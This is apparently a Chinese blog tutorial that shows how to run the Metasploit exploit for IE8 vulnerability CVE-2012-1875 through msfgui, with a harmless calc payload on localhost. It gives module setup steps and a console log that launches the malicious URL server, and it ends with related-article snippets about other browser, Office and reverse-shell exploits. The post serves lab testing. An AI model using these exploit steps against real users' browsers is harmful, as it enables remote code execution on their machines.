使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

最新推荐文章于 2022-07-08 16:42:26 发布
最新推荐文章于 2022-07-08 16:42:26 发布
阅读量8.5k 收藏 1
点赞数
分类专栏: 计算机安全 汇编 漏洞 计算机安全技术 文章标签: 测试 ie search windows file xp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/magictong/article/details/7712358
版权

        本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。

        1、rb文件下载地址http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb

        2、把下载回来的rb文件放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong文件夹下面,你也可以不改名,或者放到已有的文件夹下面,但是一定要放到exploits下面,你懂的。

        3、在msfgui界面上,使用File菜单Search选项,搜索2012-1875,如图,不出意外应该是可以搜索到的啊!


        4、选中搜到的条目,具体就是上面的magictong/cve-2012-1875 - Normal,然后点击Launch按钮,进入配置页面。


        5、在配置页面,首先选择Targets,我的目标系统是xpsp3,我选择了IE 8 on Windows XP SP3 with msvcrt ROP,因为这个漏洞要过DEP,因此利用会麻烦点。


        6、然后选择Payload,这里选择了exec,启动calc(计算器)。SRVHOST里面输入本机(MSF所在的机器,不是有漏洞的机器,如果有漏洞机器就是MSF所在的机器,则输入127.0.0.1即可)的局域网IP,如果直接在本机测试,输入127.0.0.1即可。


        7、然后点击Run inConsole ,等待,直到msfgui的主界面下console TAB页打出如下信息:

msf  exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875
msf  exploit(cve-2012-1875) > set TARGET 1
TARGET => 1
msf  exploit(cve-2012-1875) > set PAYLOAD windows/exec
msf  exploit(cve-2012-1875) > set CMD calc
PAYLOAD => windows/exec
CMD => calc
msf  exploit(cve-2012-1875) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf  exploit(cve-2012-1875) > exploit
[*] Exploit running as background job.
[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv
[*] Server started.

        8、现在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本机进行测试了。

magictong
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft Office。 在本模块上有很多事情需要改进,但是如果有时间我会在将来进行更新。 安装 将CVE-2018-8174.rb复制到/ usr / share / metasploit-framework / modules / exploits / windows / fileformat / 将CVE-2018-8174.rtf复制到/ usr / share / metasploit-framework / data / exploits / 该漏洞无法与meterpreter shellcode一起很好地工作,因此
MSF渗透实验
weixin_51646864的博客
08-11 1171
浏览器攻击渗透(MS10_018) 环境: 1、虚拟机Windows2003系统(靶机) 2、虚拟机linux2020.2(攻击机) 步骤: 一、启动虚拟机linux2020.2,终端输入msfconsole启动 二、输入指令search ms10_018查看一下,这是2010年的浏览器漏洞。 三、接下来搜索ie浏览器:输入指令search ie 回车后可以看到关于ie浏览器历史漏洞 四、这里选择2010年的漏洞进行实验。输入指令: use exploit/windows/browser/ms10_0
IE 0day 漏洞(kb981374)橙色预警
weixin_33712987的博客
03-10 75
IE浏览器再现新0day漏洞,该漏洞可能允许远程执行代码,***利用该漏洞可以制造一个特别的页面,再通过电子邮件、IM消息或其它欺骗的方式,诱使用户访问这个特殊的页面而触发。一 漏洞发展: 2010.3.10 微软发布安全广告981374,并表示要发布额外补丁修复该漏洞(通常情况下,微软只有特别严重的安全漏洞才会启动额外补丁发布流程。)二、漏洞简述:此IE新漏洞存在于iepeers...
metasploit介绍及使用
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
Microsoft IE jscript远程命令执行漏洞复现(CVE-2020-0674)
锋刃科技的博客
07-13 1791
简介 该漏洞影响组件为jscript.dll,该动态链接库是微软Internet Explorer浏览器的Javascript引擎之一,其中IE8及以下使用jscript.dll,IE9及以上默认使用jscript9.dll,但网页可以通过《script》标签指定在IE8兼容性模式下加载jscript.dll,因此IE9、IE10、IE11都受到此漏洞影响。 从操作系统范围来看,本漏洞影响范围横跨Windows 7至Windows 10中所有的个人操作系统和服务器操作系统。 该漏洞是一个U...
Magicodes.IE基础教程之导出Pdf
magicodes
02-28 503
原文作者:hueifeng 说明 本教程主要说明如何使用Magicodes.IE.Pdf完成Pdf收据导出 要点 导出PDF数据 自定义PDF模板 导出单据 如何批量导出单据 导出特性说明 PdfExporterAttribute PdfExporterAttribute特性用于设置Pdf导出的总体设置,比如方向、纸张等。主要包含如下设置: Name:文档标题 FontSize:字...
Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
weixin_34189116的博客
04-29 3141
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型 4、攻击Windows服务器 5、利用公用服务 6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏 7、MS17-010 EternalRomance/EternalSynergy/EternalChampion 8、植入后门 9、拒绝服务攻击 简介 在第二...
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 1925
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell)
漏洞复现---MS10-046漏洞
liu914589417的博客
04-27 4822
漏洞复现—MS10-046漏洞 实验工具 1、VMware虚拟机 2、Windows7系统虚拟机 3、Kali 2021 系统虚拟机 1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。 2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。 3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。 4、引用编号
利用Metasploit测试一个古老的IE8漏洞(编号CVE-2012-1875
exploitZhou的博客
07-26 1072
详细步骤: 1. 在exploit-db中寻找漏洞相关的rb文件,(注意:在下载的时候记得关闭各种360以及电脑管家和电脑自带防火墙,不然会有病毒报错),下载地址:Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) 2. 把down好的.rb文件
端口渗透+漏洞月报
11-14
请大家多多关注 背景介绍 通常内网渗透很多都是基亍 ARP 癿攻击,但 ARP 攻击对内网癿负担太重,很容易被収 现,无法迕行隐蔽癿内网渗透,亍是很多人使用 DHCP。 所以,今天我们要讱癿是基亍 DHCP 协议癿攻击。 基亍 DHCP 癿攻击理解起来很简单。 首先伪造 Mac 地址耗竭正常癿 DHCP 朋务器癿 IP 地址,然后黑客用自己癿主机伪造 一个 DHCP 朋务器。 那么新连上内网癿主机叧能使用流氓 DHCP 朋务器凾配癿 IP,返样黑客癿主机就发成 了内网网关,可以借此控制内网中其他主机癿网络流量。
struts2漏洞扫描工具
08-10
对struts2远程漏洞扫描工具
ProxyLogon-CVE-2021-26855-metasploit:CVE-2021-26855 proxyLogon metasploit利用脚本
03-17
ProxyLogon-CVE-2021-26855-metasploit CVE-2021-26855 proxyLogon metasploit利用脚本
fortilogger_arbitrary_fileupload:CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit
05-08
CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit) 日期:30-01-2021 漏洞利用作者:Berkan Er 供应商主页: : 软件链接: : 版本:4.4.2.2 经过测试Windows 10 Enterprise x64 CVE:...
Heap Spray原理浅析
热门推荐
magictong的专栏
03-24 3万+
Heap Spray原理浅析 Magictong 2012/03   摘要:本文主要介绍Heap Spray的基本原理和特点、以及防范技术。 关键词:Heap Spray、溢出攻击、漏洞利用、堆溢出   Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在sh
CMP指令和标志位
magictong的专栏
03-23 1万+
      汇编中的CMP指令是一条比较指令,对比两个操作数的大小,但是计算机并不理解大小,它只是对两个操作数进行了一次减法操作,然后对一些标志位进行了一些逻辑运算来判断哪个数大,涉及的标志位有如下一些:      CF:是否有进位或者借位      ZF:0标志位,就是结果是否为0      OF:溢出标志位,是否计算机结果溢出了      SF:符号位,0为正,1为负 
SafeSEH原理及绕过技术浅析
magictong的专栏
04-27 1万+
SafeSEH原理及绕过技术浅析     作者:magictong 时间:2012年3月16日星期五   摘要:主要介绍SafeSEH的基本原理和SafeSEH的绕过技术,重点在原理介绍。 关键词:SafeSEH;绕过技术;异常处理   目录 前言 SafeSEH的保护原理 (1)      二进制层面 (2)      系统层面 怎么关掉编译器的SafeSEH支持
cve-2017-7504漏洞复现
最新发布
08-23
2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值